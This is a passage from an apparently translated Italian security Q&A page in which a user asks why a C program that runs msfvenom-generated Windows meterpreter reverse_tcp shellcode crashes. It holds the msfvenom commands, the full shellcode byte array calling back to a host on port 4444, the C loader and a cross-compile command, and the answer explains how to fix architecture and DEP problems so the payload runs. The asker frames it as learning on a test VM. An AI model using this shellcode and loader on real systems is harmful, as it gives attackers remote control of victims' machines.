Esecuzione di uno shellcode msfvenom nel programma C.

Naviga le tue risposte
2

Questo è ovviamente a scopo didattico. Sono stato interessato a saperne di più sul malware e su come funziona.

Sto cercando di ottenere una copia tcp inversa di meterpreter su Windows 10, ma ancora più importante eseguirla come shellcode da un programma C.

Ho provato che la mia shell inversa meterpreter genera un PE standalone con: 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.228 lport=4444 -f exe -o reverse_shell.exe

Quando eseguo questo sul mio Windows 10 VM, nessun problema, una sessione è aperta.

Ora, quello che mi piacerebbe fare, è eseguire msfvenom prodotto shellcode da un programma c.

Per ottenere lo shellcode che sto utilizzando: 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.228 lport=4444 -f c

La mia fonte c assomiglia a questa: 

#include <stdio.h>
#include <stdlib.h>

char shellcode[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\xe4\x68\x02"
"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff"
"\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
"\x53\xff\xd5";

int main (int argc, char **argv) {
  int (*ret)() = (int(*)())shellcode;
  ret();
}

E sto cross compilando su kali linux con: 

x86_64-w64-mingw32-gcc rev_shell.c -o rev_shell.exe

L'esecuzione sulla mia VM di Windows mi provoca solo un arresto anomalo sotto forma di: "rev_shell.exe ha smesso di funzionare"

Sono abbastanza recente a c e all'ecosistema Windows, ma presumo che questo tipo di comportamento possa apparire malevolo. Windows interrompe la mia esecuzione? C'è qualcosa di sbagliato nel mio codice shell o c?

    
posta ucklvs 02.01.2018 - 09:05
fonte

1 risposta

1

Come menzionato nei commenti, hai un paio di problemi diversi:

  1. Stai utilizzando lo shellcode a 32 bit in un binario a 64 bit. Questo avrà problemi perché è probabile che si riferisca al puntatore dello stack come esp invece che rsp , ecc. Dovresti invece utilizzare il carico utile windows/x64/meterpreter/reverse_tcp , o produrre un binario a 32 bit (che funzionerà bene su un Sistema Windows a 64 bit, in quanto hanno la compatibilità all'indietro).
  2. Il tuo codice verrà inserito nello stack dell'applicazione, portando a DEP che impedisce che sia eseguibile. Avrai bisogno di memoria VirtualAlloc che sia sia scrivibile che eseguibile e copi lo shellcode in esso prima dell'esecuzione. Non è necessario creare un nuovo thread per farlo eseguire come il corpo principale del tuo eseguibile. C'è un ottimo esempio di fare proprio questo .
risposta data 08.01.2018 - 23:34
fonte

Leggi altre domande sui tag

Il numero di colonne della tabella SQL cambia con la query di iniezione? In che modo ASLR protegge i punti di ingresso di libc?